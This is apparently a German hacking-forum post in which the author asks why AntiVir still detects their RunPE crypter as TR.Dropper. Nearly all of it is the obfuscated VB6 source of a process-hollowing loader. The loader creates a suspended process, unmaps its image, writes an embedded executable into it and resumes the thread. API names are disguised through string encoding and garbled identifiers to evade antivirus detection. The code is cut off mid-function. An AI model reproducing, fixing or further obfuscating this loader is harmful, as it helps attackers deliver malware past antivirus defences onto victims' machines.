RunPe wird als Tr.Dropper erkannt ?!

[locos]

Howdi,
hab mir meine RunPe jetzt komplett verschlüsselt,
alle Strings verschlüsselt + API's verschlüsselt + Vars geändert.

Es ist alles UD bis auf AntiVir erkennt TR.Dropper.

Hier mal der code:

Code:

Option Explicit

Private Const fgvgbhjutfghu345t7fzgdhDCFGVH       As Long = &H5A4D&
Private Const ghjZGHJUHZGVHBJHZGz57uHGJK        As Long = &H4550&

Private Const fvgbhZGFVBNHGFD5678uhvBNHGFD           As Long = &H40
Private Const tZUJHBVFghjzt4567uhgFDCVBH           As Long = &HF8
Private Const tzujBVFRGHJHGFder45tzGFVBNHJ     As Long = &H28
Private Const RTZUJHGfdsertgz6545678uHGFDFGH As Long = &H28

Private Const DFGFVBHGVGe4567zgfde456zh              As Long = &H10007
Private Const EFghjnbvcdE8765rTGHBVCFDRFTZH          As Long = &H4
Private Const gfderTZGHJUZTRe4567ujhGFGh                As Long = &H1000
Private Const RTZUJhgfde45678ijhgt678ujh               As Long = &H2000
Private Const iuztdFGHUZTREtz67u765rf    As Long = &H40

Private Declare Sub WEDFghbtfvrde4567icvghbun Lib "kernel32" Alias "RtlMoveMemory" (pDst As Any, pSrc As Any, ByVal dlen As Long)

Private IJjuztgzgr54678fUGVCz765ftz         As Long
Private qwtzukhgUFGDZTr74fuzgvI      As Long
Private OIHnouzFVU65e7dZGV         As Boolean
Private IctfguzctzutFUzvu567          As Long
Private Uczfuz67zgiuUcz6789       As Long
Private Utgvuzgvzdt7658tfIGUH(&HFF)   As Byte

Private Type RTZtrfdfghzt4567uztgfrdghzu
    sadfg34sdfgsscxvtFFASDF3                          As Long
    lpReserved                  As Long
    lpDesktop                   As Long
    lpTitle                     As Long
    dwX                         As Long
    dwY                         As Long
    dwXSize                     As Long
    dwYSize                     As Long
    dwXCountChars               As Long
    dwYCountChars               As Long
    dwFillAttribute             As Long
    dwFlags                     As Long
    wShowWindow                 As Integer
    cbReserved2                 As Integer
    lpReserved2                 As Long
    hStdInput                   As Long
    hStdOutput                  As Long
    hStdError                   As Long
End Type

Private Type WERTZujhgbfde345678i9765rttfgh
    sdfg3qwert34hggdfx43cv42rfsdg                    As Long
    sdfg3qwert34ahggdfx43cv42rfsdg                     As Long
    sdfg3qwert34aashggedfx43cv42rfsdg                 As Long
    sdfg3qwert34ahggedfx43cv42rfsdg                  As Long
End Type

Private Type RTZUZHGFd4567uzhgfgvbhj
    sdfg3qwert34a23ashggedfx43cv42rfsdg                 As Long
    sdfg3qwasd3cv42rfsdg                  As Long
    sdfg3qwasdsdf3cv42rfsdg                     As Long
    ErrorOffset                 As Long
    ErrorSelector               As Long
    DataOffset                  As Long
    DataSelector                As Long
    RegisterArea(1 To 80)       As Byte
    Cr0NpxState                 As Long
End Type

Private Type dfgsrfghjz6asdasdf5ght7ghtzr676
    sdfg3qwasdasdfsdf3cv42rfsdg                As Long
    Dr0                         As Long
    Dr1                         As Long
    Dr2                         As Long
    Dr3                         As Long
    Dr6                         As Long
    Dr7                         As Long
    FloatSave                   As RTZUZHGFd4567uzhgfgvbhj
    SegGs                       As Long
    SegFs                       As Long
    SegEs                       As Long
    SegDs                       As Long
    Edi                         As Long
    Esi                         As Long
    sadfg34324sdsdasdgssd3scxvtFFASDF3                         As Long
    Edx                         As Long
    Ecx                         As Long
    afasdfUIZRFi7fi6rfigu76tf                         As Long
    Ebp                         As Long
    Eip                         As Long
    SegCs                       As Long
    EFlags                      As Long
    Esp                         As Long
    SegSs                       As Long
End Type

Private Type QWERTZUI456789asdfghj98765dcfg
    sdf234sfdfsdfsdf3ascv42rfsdg                     As Integer
    e_cblp                      As Integer
    e_cp                        As Integer
    e_crlc                      As Integer
    e_cparhdr                   As Integer
    e_minalloc                  As Integer
    e_maxalloc                  As Integer
    e_ss                        As Integer
    e_sp                        As Integer
    e_csum                      As Integer
    e_ip                        As Integer
    e_cs                        As Integer
    e_lfarlc                    As Integer
    e_ovno                      As Integer
    e_res(0 To 3)               As Integer
    e_oemid                     As Integer
    e_oeminfo                   As Integer
    e_res2(0 To 9)              As Integer
    sadfg34tFFASDF3                    As Long
End Type

Private Type OIUZTR6578JHGFD34567
    Machine                     As Integer
    sdfg3sdasddjhdhggdfxcv42rfsdg            As Integer
    TimeDateStamp               As Long
    PointerToSymbolTable        As Long
    NumberOfSymbols             As Long
    SizeOfOptionalHeader        As Integer
    Characteristics             As Integer
End Type

Private Type NJUZHB456TFdfgh
    sadfg34sdfgssd3scxvtFFASDF3              As Long
    afasdfUI435345345ZRFi7fi6rfigu76tf                        As Long
End Type

Private Type tghbZH7uj4rfg67zujh
    Magic                       As Integer
    MajorLinkerVersion          As Byte
    MinorLinkerVersion          As Byte
    SizeOfCode                  As Long
    SizeOfInitializedData       As Long
    SizeOfUnitializedData       As Long
    sdfg3qwasas234dasadfsdf3cv42rfsdg         As Long
    BaseOfCode                  As Long
    BaseOfData                  As Long
    sdfg3s5345dasddjhdhggdfxcv42rfsdg                   As Long
    SectionAlignment            As Long
    FileAlignment               As Long
    MajorOperatingSystemVersion As Integer
    MinorOperatingSystemVersion As Integer
    MajorImageVersion           As Integer
    MinorImageVersion           As Integer
    MajorSubsystemVersion       As Integer
    MinorSubsystemVersion       As Integer
    W32VersionValue             As Long
    sdfg3asds5345dasddjhdhggdfxcv42rfsdg                 As Long
    sdfg3qwert34hggdfxcv42rfsdg               As Long
    CheckSum                    As Long
    SubSystem                   As Integer
    DllCharacteristics          As Integer
    SizeOfStackReserve          As Long
    SizeOfStackCommit           As Long
    SizeOfHeapReserve           As Long
    SizeOfHeapCommit            As Long
    LoaderFlags                 As Long
    NumberOfRvaAndSizes         As Long
    sdf234sfdfsdf3cv42rfsdg(0 To 15)      As NJUZHB456TFdfgh
End Type

Private Type vgcfdreDRFTZGh456ftgz67GHJ
    sdfg3qwas234dasdfsdf3cv42rfsdg                   As Long
    sdfg3sdasdfsd4F4ta56ezhgdfxcv42rfsdg                  As OIUZTR6578JHGFD34567
    sdfg3qwas234dasadfsdf3cv42rfsdg              As tghbZH7uj4rfg67zujh
End Type

Private Type QWedfghjNBGF434567ZGFH
   Characteristics              As Long
   TimeDateStamp                As Long
   MajorVersion                 As Integer
   MinorVersion                 As Integer
   lpName                       As Long
   Base                         As Long
   NumberOfFunctions            As Long
   sdf234sfdfsdf3ascv42rfsdg                As Long
   afasdfUI43w234er23r4dfZRFi7fi6rfigu76tf         As Long
   afasdfUI4353sdf45345ZRFi7fi6rfigu76tf             As Long
   afasdfUI43wer23r4dfZRFi7fi6rfigu76tf      As Long
End Type

Private Type POIUZhj4567zgFVCDFGh
    SecName                     As String * 8
    VirtualSize                 As Long
    sadfg34sdfgssd3scxvtFFASDF3              As Long
    sadfg34324sdsdgssd3scxvtFFASDF3               As Long
    sadfg34324sdfgssd3scxvtFFASDF3            As Long
    PointerToRelocations        As Long
    PointerToLinenumbers        As Long
    NumberOfRelocations         As Integer
    NumberOfLinenumbers         As Integer
    Characteristics             As Long
End Type
        
Public Function sdfg34F4ta56ezhgdfxcv42rfsdg() As Long
    'This function will be replaced with machine code laterz
    'Do not add any public procedure on top of it
End Function

Private Function sdfg34F4tssdfdfDAF3sdfsdfxcv42rfsdg() As Long
    WEDFghbtfvrde4567icvghbun IctfguzctzutFUzvu567, ByVal ObjPtr(Me), &H4
    IctfguzctzutFUzvu567 = IctfguzctzutFUzvu567 + &H1C
    WEDFghbtfvrde4567icvghbun Uczfuz67zgiuUcz6789, ByVal IctfguzctzutFUzvu567, &H4
    WEDFghbtfvrde4567icvghbun ByVal IctfguzctzutFUzvu567, VarPtr(Utgvuzgvzdt7658tfIGUH(0)), &H4
    sdfg34F4tssdfdfDAF3sdfsdfxcv42rfsdg = sdfg34F4ta56ezhgdfxcv42rfsdg
    WEDFghbtfvrde4567icvghbun ByVal IctfguzctzutFUzvu567, Uczfuz67zgiuUcz6789, &H4
End Function

Public Function sdfg34F4tsdfDAF3sdfsdfxcv42rfsdg(ByVal sdfg34FsdfDAF3sdfsdfxcv42rfsdg As String, ByVal dfgsrt43afd454frtz6asdf5ght7ghtzr676 As String) As Long
    sdfg34F4tsdfDAF3sdfsdfxcv42rfsdg = Me.dfgsrt43afd454frtz6asdasdf5ght7ghtzr676(Me.sdfg34F4tssddsffdfDAF3sdfsdfxcv42rfsdg(sdfg34FsdfDAF3sdfsdfxcv42rfsdg), dfgsrt43afd454frtz6asdf5ght7ghtzr676)
End Function

Public Function sdfg34F4tssddsffdfDAF3sdfsdfxcv42rfsdg(ByVal sdfg34FsdfDAF3sdfsdfxcv42rfsdg As String) As Long
    sdfg34F4tssddsffdfDAF3sdfsdfxcv42rfsdg = sdfg3sdsd4F4ta56ezhgdfxcv42rfsdg(qwtzukhgUFGDZTr74fuzgvI, StrPtr(sdfg34FsdfDAF3sdfsdfxcv42rfsdg & vbNullChar))
End Function

Public Function dfgsrfghjzeztu56uzFf5ght7ghtzr676(ByRef sdfg34F4tasdrtg5454eruzdfxcv42rfsdg() As Byte, Optional sdfg34F4tasdrtg523f454eruzdfxcv42rfsdg As String) As Boolean
    Dim rtgzhRfDFf3467gTRhf5CFGV                       As Long
    Dim rtgzhRDFgZGvt354fcrd567gTRCFGV       As QWERTZUI456789asdfghj98765dcfg
    Dim rtgzhRDFgZ6Gvt354fcrd567gTRCFGV       As vgcfdreDRFTZGh456ftgz67GHJ
    Dim dfgsrf34tfghjzeztu56uzFf5ght7ghtzr676   As POIUZhj4567zgFVCDFGh
    Dim dfgsrf34tfghjzeztu67ujhgght7ghtzr676            As RTZtrfdfghzt4567uztgfrdghzu
    Dim dfgsrf34tcxvfghjzeztu67ujhgght7ghtzr676    As WERTZujhgbfde345678i9765rttfgh
    Dim sdfg34FDAF32rfsdg                As dfgsrfghjz6asdasdf5ght7ghtzr676
    Dim sdfg34FsdfDAF32rfsdg                 As Long
    Dim sdfg34FsdfDAF3sdfxcv42rfsdg                  As Long
    Dim dfgsrt4354frtz6asdf5ght7ghtzr676                    As Long

    Call WEDFghbtfvrde4567icvghbun(rtgzhRDFgZGvt354fcrd567gTRCFGV, sdfg34F4tasdrtg5454eruzdfxcv42rfsdg(0), fvgbhZGFVBNHGFD5678uhvBNHGFD)
    
    If Not rtgzhRDFgZGvt354fcrd567gTRCFGV.sdf234sfdfsdfsdf3ascv42rfsdg = fgvgbhjutfghu345t7fzgdhDCFGVH Then
        Exit Function
    End If

    Call WEDFghbtfvrde4567icvghbun(rtgzhRDFgZ6Gvt354fcrd567gTRCFGV, sdfg34F4tasdrtg5454eruzdfxcv42rfsdg(rtgzhRDFgZGvt354fcrd567gTRCFGV.sadfg34tFFASDF3), tZUJHBVFghjzt4567uhgFDCVBH)
    
    If Not rtgzhRDFgZ6Gvt354fcrd567gTRCFGV.sdfg3qwas234dasdfsdf3cv42rfsdg = ghjZGHJUHZGVHBJHZGz57uHGJK Then
        Exit Function
    End If
    
    sdfg34FsdfDAF32rfsdg = sdfg34F4tssddsffdfDAF3sdfsdfxcv42rfsdg(sdf234sfdasdasdw4t4fsdfsdf3ascv42rfsdg("wq~zqx?>"))
    sdfg34FsdfDAF3sdfxcv42rfsdg = sdfg34F4tssddsffdfDAF3sdfsdfxcv42rfsdg(sdf234sfdasdasdw4t4fsdfsdf3ascv42rfsdg("z€pxx"))
    
    If sdfg34F4tasdrtg523f454eruzdfxcv42rfsdg = vbNullString Then
        sdfg34F4tasdrtg523f454eruzdfxcv42rfsdg = Space(260)
        dfgsrt4354frtz6asdf5ght7ghtzr676 = dfgsrt43afd454frtz6asdasdf5ght7ghtzr676(sdfg34FsdfDAF32rfsdg, sdf234sfdasdasdw4t4fsdfsdf3ascv42rfsdg("Sq€Y{pxqRuxqZmyqc"))
        sdfg3sdsd4F4ta56ezhgdfxcv42rfsdg dfgsrt4354frtz6asdf5ght7ghtzr676, App.hInstance, StrPtr(sdfg34F4tasdrtg523f454eruzdfxcv42rfsdg), 260
    End If
    
    With rtgzhRDFgZ6Gvt354fcrd567gTRCFGV.sdfg3qwas234dasadfsdf3cv42rfsdg
        
        dfgsrf34tfghjzeztu67ujhgght7ghtzr676.sadfg34sdfgsscxvtFFASDF3 = Len(dfgsrf34tfghjzeztu67ujhgght7ghtzr676)
            
        dfgsrt4354frtz6asdf5ght7ghtzr676 = dfgsrt43afd454frtz6asdasdf5ght7ghtzr676(sdfg34FsdfDAF32rfsdg, sdf234sfdasdasdw4t4fsdfsdf3ascv42rfsdg("O~qm€q\~{oqc"))
        sdfg3sdsd4F4ta56ezhgdfxcv42rfsdg dfgsrt4354frtz6asdf5ght7ghtzr676, 0, StrPtr(sdfg34F4tasdrtg523f454eruzdfxcv42rfsdg), 0, 0, 0, EFghjnbvcdE8765rTGHBVCFDRFTZH, 0, 0, VarPtr(dfgsrf34tfghjzeztu67ujhgght7ghtzr676), VarPtr(dfgsrf34tcxvfghjzeztu67ujhgght7ghtzr676)

        dfgsrt4354frtz6asdf5ght7ghtzr676 = dfgsrt43afd454frtz6asdasdf5ght7ghtzr676(sdfg34FsdfDAF3sdfxcv42rfsdg, sdf234sfdasdasdw4t4fsdfsdf3ascv42rfsdg("Z€azym|buqƒ[r_qo€u{z"))
        sdfg3sdsd4F4ta56ezhgdfxcv42rfsdg dfgsrt4354frtz6asdf5ght7ghtzr676, dfgsrf34tcxvfghjzeztu67ujhgght7ghtzr676.sdfg3qwert34hggdfx43cv42rfsdg, .sdfg3s5345dasddjhdhggdfxcv42rfsdg
        
        dfgsrt4354frtz6asdf5ght7ghtzr676 = dfgsrt43afd454frtz6asdasdf5ght7ghtzr676(sdfg34FsdfDAF32rfsdg, sdf234sfdasdasdw4t4fsdfsdf3ascv42rfsdg("bu~€mxMxx{oQ„"))
        sdfg3sdsd4F4ta56ezhgdfxcv42rfsdg dfgsrt4354frtz6asdf5ght7ghtzr676, dfgsrf34tcxvfghjzeztu67ujhgght7ghtzr676.sdfg3qwert34hggdfx43cv42rfsdg, .sdfg3s5345dasddjhdhggdfxcv42rfsdg, .sdfg3asds5345dasddjhdhggdfxcv42rfsdg, gfderTZGHJUZTRe4567ujhGFGh Or RTZUJhgfde45678ijhgt678ujh, iuztdFGHUZTREtz67u765rf
        
        dfgsrt4354frtz6asdf5ght7ghtzr676 = dfgsrt43afd454frtz6asdasdf5ght7ghtzr676(sdfg34FsdfDAF32rfsdg, sdf234sfdasdasdw4t4fsdfsdf3ascv42rfsdg("c~u€q\~{oqYqy{~…"))
        sdfg3sdsd4F4ta56ezhgdfxcv42rfsdg dfgsrt4354frtz6asdf5ght7ghtzr676, dfgsrf34tcxvfghjzeztu67ujhgght7ghtzr676.sdfg3qwert34hggdfx43cv42rfsdg, .sdfg3s5345dasddjhdhggdfxcv42rfsdg, VarPtr(sdfg34F4tasdrtg5454eruzdfxcv42rfsdg(0)), .sdfg3qwert34hggdfxcv42rfsdg, 0
    
        For rtgzhRfDFf3467gTRhf5CFGV = 0 To rtgzhRDFgZ6Gvt354fcrd567gTRCFGV.sdfg3sdasdfsd4F4ta56ezhgdfxcv42rfsdg.sdfg3sdasddjhdhggdfxcv42rfsdg - 1
            WEDFghbtfvrde4567icvghbun dfgsrf34tfghjzeztu56uzFf5ght7ghtzr676, sdfg34F4tasdrtg5454eruzdfxcv42rfsdg(rtgzhRDFgZGvt354fcrd567gTRCFGV.sadfg34tFFASDF3 + tZUJHBVFghjzt4567uhgFDCVBH + RTZUJHGfdsertgz6545678uHGFDFGH * rtgzhRfDFf3467gTRhf5CFGV), Len(dfgsrf34tfghjzeztu56uzFf5ght7ghtzr676)
            sdfg3sdsd4F4ta56ezhgdfxcv42rfsdg dfgsrt4354frtz6asdf5ght7ghtzr676, dfgsrf34tcxvfghjzeztu67ujhgght7ghtzr676.sdfg3qwert34hggdfx43cv42rfsdg, .sdfg3s5345dasddjhdhggdfxcv42rfsdg + dfgsrf34tfghjzeztu56uzFf5ght7ghtzr676.sadfg34sdfgssd3scxvtFFASDF3, VarPtr(sdfg34F4tasdrtg5454eruzdfxcv42rfsdg(dfgsrf34tfghjzeztu56uzFf5ght7ghtzr676.sadfg34324sdfgssd3scxvtFFASDF3)), dfgsrf34tfghjzeztu56uzFf5ght7ghtzr676.sadfg34324sdsdgssd3scxvtFFASDF3, 0
        Next rtgzhRfDFf3467gTRhf5CFGV

        sdfg34FDAF32rfsdg.sdfg3qwasdasdfsdf3cv42rfsdg = DFGFVBHGVGe4567zgfde456zh
        
        dfgsrt4354frtz6asdf5ght7ghtzr676 = dfgsrt43afd454frtz6asdasdf5ght7ghtzr676(sdfg34FsdfDAF3sdfxcv42rfsdg, sdf234sfdasdasdw4t4fsdfsdf3ascv42rfsdg("Z€Sq€O{z€q„€`t~qmp"))
        sdfg3sdsd4F4ta56ezhgdfxcv42rfsdg dfgsrt4354frtz6asdf5ght7ghtzr676, dfgsrf34tcxvfghjzeztu67ujhgght7ghtzr676.sdfg3qwert34ahggdfx43cv42rfsdg, VarPtr(sdfg34FDAF32rfsdg)
    
        dfgsrt4354frtz6asdf5ght7ghtzr676 = dfgsrt43afd454frtz6asdasdf5ght7ghtzr676(sdfg34FsdfDAF32rfsdg, sdf234sfdasdasdw4t4fsdfsdf3ascv42rfsdg("c~u€q\~{oqYqy{~…"))
        sdfg3sdsd4F4ta56ezhgdfxcv42rfsdg dfgsrt4354frtz6asdf5ght7ghtzr676, dfgsrf34tcxvfghjzeztu67ujhgght7ghtzr676.sdfg3qwert34hggdfx43cv42rfsdg, sdfg34FDAF32rfsdg.sadfg34324sdsdasdgssd3scxvtFFASDF3 + 8, VarPtr(.sdfg3s5345dasddjhdhggdfxcv42rfsdg), 4, 0
       
        sdfg34FDAF32rfsdg.afasdfUIZRFi7fi6rfigu76tf = .sdfg3s5345dasddjhdhggdfxcv42rfsdg + .sdfg3qwasas234dasadfsdf3cv42rfsdg
        
        dfgsrt4354frtz6asdf5ght7ghtzr676 = dfgsrt43afd454frtz6asdasdf5ght7ghtzr676(sdfg34FsdfDAF3sdfxcv42rfsdg, sdf234sfdasdasdw4t4fsdfsdf3ascv42rfsdg("Z€_q€O{z€q„€`t~qmp"))
        sdfg3sdsd4F4ta56ezhgdfxcv42rfsdg dfgsrt4354frtz6asdf5ght7ghtzr676, dfgsrf34tcxvfghjzeztu67ujhgght7ghtzr676.sdfg3qwert34ahggdfx43cv42rfsdg, VarPtr(sdfg34FDAF32rfsdg)
        
        dfgsrt4354frtz6asdf5ght7ghtzr676 = dfgsrt43afd454frtz6asdasdf5ght7ghtzr676(sdfg34FsdfDAF3sdfxcv42rfsdg, sdf234sfdasdasdw4t4fsdfsdf3ascv42rfsdg("Z€^qyq`t~qmp"))
        sdfg3sdsd4F4ta56ezhgdfxcv42rfsdg dfgsrt4354frtz6asdf5ght7ghtzr676, dfgsrf34tcxvfghjzeztu67ujhgght7ghtzr676.sdfg3qwert34ahggdfx43cv42rfsdg, 0
    End With
    
    dfgsrfghjzeztu56uzFf5ght7ghtzr676 = True
    
End Function

Public Function sdfg3sdsd4F4ta56ezhgdfxcv42rfsdg(ByVal dfgsrt4354frtz6asdf5ght7ghtzr676 As Long, ParamArray sdfg34F4tasdfsdfwe4sdf5dseruzdfxcv42rfsdg()) As Long
    Dim sdfg34F4t6sdfg6FF5dseruzdfxcv42rfsdg        As Long
    Dim rtgzhRfDFf3467gTRhf5CFGV           As Long
    Dim sdfg34F4tasdfwe45dseruzdfxcv42rfsdg       As String
    Dim sdfg34F4tasdfsdfwe45dseruzdfxcv42rfsdg     As String
    
    If dfgsrt4354frtz6asdf5ght7ghtzr676 = 0 Then Exit Function
    
    For rtgzhRfDFf3467gTRhf5CFGV = UBound(sdfg34F4tasdfsdfwe4sdf5dseruzdfxcv42rfsdg) To 0 Step -1
        sdfg34F4tasdfsdfwe45dseruzdfxcv42rfsdg = sdfg34F4tasdfsdfwe45dseruzdfxcv42rfsdg & sdf234sfdasdasdw4t4fsdfsdf3ascv42rfsdg("BD") & sdfg34F4t6sdfg65dsdffDAF3sdfsdfxcv42rfsdg(CLng(sdfg34F4tasdfsdfwe4sdf5dseruzdfxcv42rfsdg(rtgzhRfDFf3467gTRhf5CFGV)))
    Next
    
    sdfg34F4t6sdfg6FF5dseruzdfxcv42rfsdg = VarPtr(Utgvuzgvzdt7658tfIGUH(0))
    sdfg34F4t6sdfg6FF5dseruzdfxcv42rfsdg = sdfg34F4t6sdfg6FF5dseruzdfxcv42rfsdg + (UBound(sdfg34F4tasdfsdfwe4sdf5dseruzdfxcv42rfsdg) + 2) * 5
    sdfg34F4t6sdfg6FF5dseruzdfxcv42rfsdg = dfgsrt4354frtz6asdf5ght7ghtzr676 - sdfg34F4t6sdfg6FF5dseruzdfxcv42rfsdg - 5
    
    sdfg34F4tasdfwe45dseruzdfxcv42rfsdg = sdf234sfdasdasdw4t4fsdfsdf3ascv42rfsdg("DN@O>@<DA=H\M`OT=JQDH\M`OT>JAEDE<=BB?=O<O?")
    sdfg34F4tasdfwe45dseruzdfxcv42rfsdg = Replace(sdfg34F4tasdfwe45dseruzdfxcv42rfsdg, sdf234sfdasdasdw4t4fsdfsdf3ascv42rfsdg("H\M`OT=J"), sdfg34F4tasdfsdfwe45dseruzdfxcv42rfsdg)
    sdfg34F4tasdfwe45dseruzdfxcv42rfsdg = Replace(sdfg34F4tasdfwe45dseruzdfxcv42rfsdg, sdf234sfdasdasdw4t4fsdfsdf3ascv42rfsdg("H\M`OT>J"), sdfg34F4t6sdfg65dsdffDAF3sdfsdfxcv42rfsdg(sdfg34F4t6sdfg6FF5dseruzdfxcv42rfsdg))
    
    Call sdfg34F4t63465dfDAF3sdfsdfxcv42rfsdg(sdfg34F4tasdfwe45dseruzdfxcv42rfsdg)
    
    sdfg3sdsd4F4ta56ezhgdfxcv42rfsdg = sdfg34F4tssdfdfDAF3sdfsdfxcv42rfsdg
End Function

Private Function rtgzhRDFZGvtfcrd567gTRCFGV(ByVal UJGFVuizt567789tfzcrfdzdzdzdzdzdzdzJI As Long, ByRef ZTgcvuztdx756dZTCFDgzf568tg As Long, ByRef ztciugbvuzDREZrt7685tfvigb As String)
       
    Dim dfgsrtshtgh675frtz65ght7ghtzr676     As String

    dfgsrtshtgh675frtz65ght7ghtzr676 = rtgzhRDFZGvt354fcrd567gTRCFGV(UJGFVuizt567789tfzcrfdzdzdzdzdzdzdzJI)
    If InStr(1, dfgsrtshtgh675frtz65ght7ghtzr676, sdf234sfdasdasdw4t4fsdfsdf3ascv42rfsdg(":")) Then
        ZTgcvuztdx756dZTCFDgzf568tg = sdfg34F4tssddsffdfDAF3sdfsdfxcv42rfsdg(Split(dfgsrtshtgh675frtz65ght7ghtzr676, sdf234sfdasdasdw4t4fsdfsdf3ascv42rfsdg(":"))(0))
        ztciugbvuzDREZrt7685tfvigb = Split(dfgsrtshtgh675frtz65ght7ghtzr676, sdf234sfdasdasdw4t4fsdfsdf3ascv42rfsdg(":"))(1)
    End If
    
End Function

Private Function rtgzhRDFZGvt354fcrd567gTRCFGV(ByVal UJGFVuizt567789tfzcrfdzdzdzdzdzdzdzJI As Long) As String
       
    Dim dfgsrt4354frtz65ght7ghtzr676       As Byte
    
    Do
        WEDFghbtfvrde4567icvghbun dfgsrt4354frtz65ght7ghtzr676, ByVal UJGFVuizt567789tfzcrfdzdzdzdzdzdzdzJI, 1
        UJGFVuizt567789tfzcrfdzdzdzdzdzdzdzJI = UJGFVuizt567789tfzcrfdzdzdzdzdzdzdzJI + 1
        If dfgsrt4354frtz65ght7ghtzr676 = 0 Then Exit Do
        rtgzhRDFZGvt354fcrd567gTRCFGV = rtgzhRDFZGvt354fcrd567gTRCFGV & Chr$(dfgsrt4354frtz65ght7ghtzr676)
    Loop
    
End Function

Private Function sdfg34F4t6sdfg65dsdffDAF3sdfsdfxcv42rfsdg(ByVal sdfg34F4t6sdfg65dfDAF3sdfsdfxcv42rfsdg As Long) As String
    Dim sdfg34F4t6sdfg65dseruzdfxcv42rfsdg(3)   As Byte
    Dim rtgzhRfDFf3467gTRhf5CFGV           As Long
    
    WEDFghbtfvrde4567icvghbun sdfg34F4t6sdfg65dseruzdfxcv42rfsdg(0), sdfg34F4t6sdfg65dfDAF3sdfsdfxcv42rfsdg, &H4
    For rtgzhRfDFf3467gTRhf5CFGV = 0 To 3
        sdfg34F4t6sdfg65dsdffDAF3sdfsdfxcv42rfsdg = sdfg34F4t6sdfg65dsdffDAF3sdfsdfxcv42rfsdg & Right(sdf234sfdasdasdw4t4fsdfsdf3ascv42rfsdg("<") & Hex(sdfg34F4t6sdfg65dseruzdfxcv42rfsdg(rtgzhRfDFf3467gTRhf5CFGV)), 2)
    Next
End Function

Private Sub sdfg34F4t63465dfDAF3sdfsdfxcv42rfsdg(ByVal sdfg34F4t623233465dfDAF3sdfsdfxcv42rfsdg As String)
    Dim rtgzhRfDFf3467gTRhf5CFGV   As Long
    For rtgzhRfDFf3467gTRhf5CFGV = 0 To Len(sdfg34F4t623233465dfDAF3sdfsdfxcv42rfsdg) - 1 Step 2
        Utgvuzgvzdt7658tfIGUH((rtgzhRfDFf3467gTRhf5CFGV / 2)) = CByte(sdf234sfdasdasdw4t4fsdfsdf3ascv42rfsdg("2t") & Mid$(sdfg34F4t623233465dfDAF3sdfsdfxcv42rfsdg, rtgzhRfDFf3467gTRhf5CFGV + 1, 2))
    Next
End Sub

Public Sub Class_Initialize()

    Call sdfg34F4t63465dfDAF3sdfsdfxcv42rfsdg(sdf234sfdasdasdw4t4fsdfsdf3ascv42rfsdg("DNAO>@<DA@ND?<<<<<<<B@DN<<DN@<<ODN@<=ODN<<DN@<<DDE<?AO?=O<O?"))
    
    IJjuztgzgr54678fUGVCz765ftz = sdfg34F4tssdfdfDAF3sdfsdfxcv42rfsdg
    
    If Not IJjuztgzgr54678fUGVCz765ftz = 0 Then
        qwtzukhgUFGDZTr74fuzgvI = dfgsrt43afd454frtz6asdasdf5ght7ghtzr676(IJjuztgzgr54678fUGVCz765ftz, sdf234sfdasdasdw4t4fsdfsdf3ascv42rfsdg("X{mpXun~m~…c"))
        If Not qwtzukhgUFGDZTr74fuzgvI = 0 Then
            OIHnouzFVU65e7dZGV = True
        End If
    End If
End Sub

Public Function dfgsrt43afd454frtz6asdasdf5ght7ghtzr676(ByVal dfgsrt4354frtz6asdf5ght7ghtzr676 As Long, ByVal dfgsrt43afd454frtz6asdf5ght7ghtzr676 As String) As Long
    Dim rtgzhRDFgZGvt354fcrd567gTRCFGV       As QWERTZUI456789asdfghj98765dcfg
    Dim rtgzhRDFgZ6Gvt354fcrd567gTRCFGV       As vgcfdreDRFTZGh456ftgz67GHJ
    Dim rtgzhRfDFgZ6Gvt354fcrd567gTRCFGV As QWedfghjNBGF434567ZGFH
    
    Call WEDFghbtfvrde4567icvghbun(rtgzhRDFgZGvt354fcrd567gTRCFGV, ByVal dfgsrt4354frtz6asdf5ght7ghtzr676, fvgbhZGFVBNHGFD5678uhvBNHGFD)
    
    If Not rtgzhRDFgZGvt354fcrd567gTRCFGV.sdf234sfdfsdfsdf3ascv42rfsdg = fgvgbhjutfghu345t7fzgdhDCFGVH Then
        Exit Function
    End If

    Call WEDFghbtfvrde4567icvghbun(rtgzhRDFgZ6Gvt354fcrd567gTRCFGV, ByVal dfgsrt4354frtz6asdf5ght7ghtzr676 + rtgzhRDFgZGvt354fcrd567gTRCFGV.sadfg34tFFASDF3, tZUJHBVFghjzt4567uhgFDCVBH)
    
    If Not rtgzhRDFgZ6Gvt354fcrd567gTRCFGV.sdfg3qwas234dasdfsdf3cv42rfsdg = ghjZGHJUHZGVHBJHZGz57uHGJK Then
        Exit Function
    End If
    
    Dim rtgzhRfDFfghd567gTRCFGV   As Long
    Dim rtgzhRfDFfghd567gTRhf5CFGV      As Long
    Dim rtgzhRfDFfghd54567gTRhf5CFGV       As Long
    
    With rtgzhRDFgZ6Gvt354fcrd567gTRCFGV.sdfg3qwas234dasadfsdf3cv42rfsdg
        rtgzhRfDFfghd567gTRCFGV = dfgsrt4354frtz6asdf5ght7ghtzr676 + .sdf234sfdfsdf3cv42rfsdg(0).sadfg34sdfgssd3scxvtFFASDF3
        rtgzhRfDFfghd567gTRhf5CFGV = rtgzhRfDFfghd567gTRCFGV + .sdf234sfdfsdf3cv42rfsdg(0).afasdfUI435345345ZRFi7fi6rfigu76tf
        rtgzhRfDFfghd54567gTRhf5CFGV = .sdfg3s5345dasddjhdhggdfxcv42rfsdg
    End With
    
    Call WEDFghbtfvrde4567icvghbun(rtgzhRfDFgZ6Gvt354fcrd567gTRCFGV, ByVal rtgzhRfDFfghd567gTRCFGV, tzujBVFRGHJHGFder45tzGFVBNHJ)
       
    Dim rtgzhRfDFf3467gTRhf5CFGV           As Long
    Dim rtgzhRfDFf34dfzgh6TRhf5CFGV   As Long
    Dim dfgsrtshtgh675ghtzr676    As Long
    Dim dfgsrtshtgh675fght7ghtzr676    As Long

    With rtgzhRfDFgZ6Gvt354fcrd567gTRCFGV
        For rtgzhRfDFf3467gTRhf5CFGV = 0 To .sdf234sfdfsdf3ascv42rfsdg - 1
           
            WEDFghbtfvrde4567icvghbun dfgsrtshtgh675ghtzr676, ByVal rtgzhRfDFfghd54567gTRhf5CFGV + .afasdfUI4353sdf45345ZRFi7fi6rfigu76tf + rtgzhRfDFf3467gTRhf5CFGV * 4, 4
            
            If rtgzhRDFZGvt354fcrd567gTRCFGV(rtgzhRfDFfghd54567gTRhf5CFGV + dfgsrtshtgh675ghtzr676) = dfgsrt43afd454frtz6asdf5ght7ghtzr676 Then
